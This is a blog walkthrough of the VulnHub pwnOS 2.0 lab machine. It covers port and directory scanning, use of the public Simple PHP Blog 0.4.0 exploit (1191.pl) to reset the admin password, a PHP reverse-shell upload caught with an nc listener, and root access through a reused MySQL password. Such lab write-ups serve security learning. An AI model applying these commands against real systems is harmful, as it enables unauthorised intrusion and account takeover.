Setup

Attacker (Kali): 10.10.10.128

VulnHub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

VM Network: VMnet3 (Custom)

Enumeration

Host Enumeration

Use arp-scan to find the VM's IP address: sudo arp-scan -l

The box's IP is 10.10.10.100.

Port Enumeration

Perform a quick port enumeration with rustscan: rustscan -a 10.10.10.100

Full scan with nmap: nmap -A -p- 10.10.10.100 -oN nmap.txt

# Nmap 7.93 scan initiated Tue May  2 19:45:29 2023 as: nmap -A -p- -oN nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85d32b0109427b204e30036dd18f95ff (DSA)
|   2048 307a319a1bb817e715df89920ecd5828 (RSA)
|_  256 1012644b7dff6a87372638b1449fcf5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  2 19:45:38 2023 -- 1 IP address (1 host up) scanned in 9.92 seconds
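As an added example (not part of the original walkthrough), a small Python parser for the Nmap normal (-oN) output above: it pulls out each port's version string and the NSE script tree, then reports the cookie that http-cookie-flags listed without HttpOnly. The embedded sample is a constructed, trimmed copy of the scan shown above.

```python
import re

# Constructed sample: the port table from this box's Nmap -oN output, trimmed to the lines needed.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85d32b0109427b204e30036dd18f95ff (DSA)
|_  256 1012644b7dff6a87372638b1449fcf5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Welcome to this Site!
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Parse -oN output into dicts; 'scripts' maps NSE script name -> its output lines."""
    ports, script = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(), "scripts": {}})
            script = None
        elif line.startswith("|") and ports:
            body = line[1:].lstrip("_")          # "|_" marks a script's last output line
            indent = len(body) - len(body.lstrip(" "))
            content = body.strip()
            if indent <= 1:                      # "| name: text" opens a new script
                name, _, rest = content.partition(":")
                script = name.strip()
                ports[-1]["scripts"][script] = [rest.strip()] if rest.strip() else []
            elif script:                         # deeper indent continues the current script
                ports[-1]["scripts"][script].append(content)
    return ports

def missing_cookie_flags(ports):
    """Return (port, cookie, finding) for cookies http-cookie-flags reports without a flag."""
    findings, cookie = [], None
    for p in ports:
        for entry in p["scripts"].get("http-cookie-flags", []):
            if entry.endswith(":") and not entry.startswith("/"):
                cookie = entry[:-1]              # cookie name; "/:" lines are URL paths
            elif "flag not set" in entry:
                findings.append((p["port"], cookie, entry))
    return findings
```

Running parse_nmap on a full -oN file works the same way; only the port table lines are consumed and the header and footer are ignored.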

Directory Enumeration

Use gobuster to perform a directory brute force: gobuster dir -u http://10.10.10.100 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

http://10.10.10.100/index
http://10.10.10.100/info
http://10.10.10.100/login
http://10.10.10.100/register
http://10.10.10.100/includes/
http://10.10.10.100/blog/

Check the pages and find that the /info page is a phpinfo page:

And it looks like there is a blog available:

Foothold

I got the blog app's version from view-source; it's Simple PHP Blog 0.4.0:

Check whether there are any public exploits: searchsploit simple php blog 0.4.0

To avoid Metasploit, I copy 1191.pl out with the command searchsploit -m 1191

Running the script may produce an error; it can be fixed with the following command:

sudo apt-get install libswitch-perl

After fixing that, run the script again to see the usage:

Run it with the following command to change the admin's password:

./1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

Log in to /blog and use Upload Image to upload the reverse shell:

The shell's path is /blog/images:

Set up a listener with nc on Kali: nc -lvnp 5555

Then open php-reverse-shell.php and I get the reverse shell:

Privilege Escalation

I found the mysql root password in /var/www/mysqli_connect.php:

Trying to log in over SSH with it fails:

But then I got another password in /var/mysqli_connect.php:

And that one works:

Finally

There is no flag in this box. You get root, You win.

It's an easy box, but it will be worth coming back to later to look for other ways to get root.

Author: z0sen
Copyright notice: Unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. When reposting, please credit z0sen's Blog.
Tags: Walkthrough, Linux, VulnHub